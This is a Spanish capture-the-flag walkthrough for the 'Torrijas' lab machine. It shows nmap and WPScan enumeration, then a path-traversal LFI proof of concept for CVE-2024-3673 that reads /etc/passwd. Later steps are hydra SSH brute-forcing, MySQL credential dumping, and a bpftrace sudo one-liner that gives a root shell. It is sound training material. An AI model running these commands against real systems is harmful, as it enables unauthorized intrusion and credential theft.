Torrijas

🔍 Dificultad: Principiante

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.66

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open 192.168.1.66 --min-rate 5000 -n

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80,3306 -v 192.168.1.66

para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 80.

Ponemos el dominio torrija.thl en /etc/hosts. Tras esto realizamos un escaneo de directorios.

gobuster dir -u http://192.168.1.66 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt,php

Nos llama la atención que hay un wordpress por lo que indagamos más en ese directorio.

Enumeramos los usuarios y los plugins con WPScan.

wpscan --url http://192.168.1.66/wordpress/ --enumerate u,vp

🚀 EXPLOTACIÓN

Encontramos un usuario pero al realizar fuerza bruta no encuentra la contraseña. Entonces realizo un enumeración de plugins de manera agresiva.

wpscan --url http://192.168.1.66/wordpress --enumerate ap --force --plugins-detection mixed

Buscando los dos por Internet nos llama la atención el segundo ya que se puede realizar un LFI.

CVE-2024-3673 - Web Directory Free < 1.7.3 - Unauthenticated LFI

https://github.com/Nxploited/CVE-2024-3673

python3 CVE-2024-3673.py --url http://192.168.1.66/wordpress --file ../../../../../etc/passwd

Encontramos dos usuarios llamados Primo y Premo pero solo encontramos a través de fuerza bruta la contraseña de Premo.

hydra -l premo -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.66 -t 64

Nos conectamos con esas credenciales a través de SSH.

ssh premo@192.168.1.66

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos SUDO.

En este caso, al estar trabajando con una instalación de WordPress y con el puerto 3306 (MySQL) expuesto, el siguiente paso será intentar obtener las credenciales de la base de datos. Un archivo crucial en WordPress que suele contener esta información es el wp-config.php.

Nos conectamos a la base de datos.

mysql -u admin -p

Indagamos que tenemos en la base de datos.

show databases;
use wordpress;
show tables;
select * from wp_users;

Al ser la contraseña hasheada no nos sirve ya que estamos dentro pero probamos si podemos entrar en la base de datos de root.

mysql -u admin -p
show databases;
use Torrijas;
show tables;
select * from primo;

Nos logueamos con las credenciales.

bpftrace | GTFOBins

sudo bpftrace -c /bin/sh -e 'END {exit()}'

Ya somos root.

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀